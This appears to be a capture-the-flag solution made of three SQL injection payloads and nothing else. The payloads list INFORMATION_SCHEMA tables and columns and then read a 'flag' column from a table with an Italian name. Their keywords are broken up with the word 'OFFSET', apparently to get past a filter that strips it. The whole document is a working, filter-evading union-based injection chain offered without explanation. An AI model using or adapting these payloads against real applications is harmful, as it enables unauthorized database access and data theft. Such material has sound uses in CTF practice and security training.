' and 1!=1 UNOFFSETION SELECOFFSETT TABLE_NAME FROOFFSETM INFORMATION_SCHEMA.TABLES WHEOFFSETRE TABLE_NAME!='emails

' and 1!=1 UNOFFSETION SELECOFFSETT COLUMN_NAME FROOFFSETM INFORMATION_SCHEMA.COLUMNS WHEOFFSETRE TABLE_NAME='qua_trovi_la_tua_flaOFFSETg

' and 1!=1 UNOFFSETION SELECOFFSETT la_flOFFSETag_sta_qua FROOFFSETM qua_trovi_la_tua_flaOFFSETg WHEOFFSETRE '1'='1
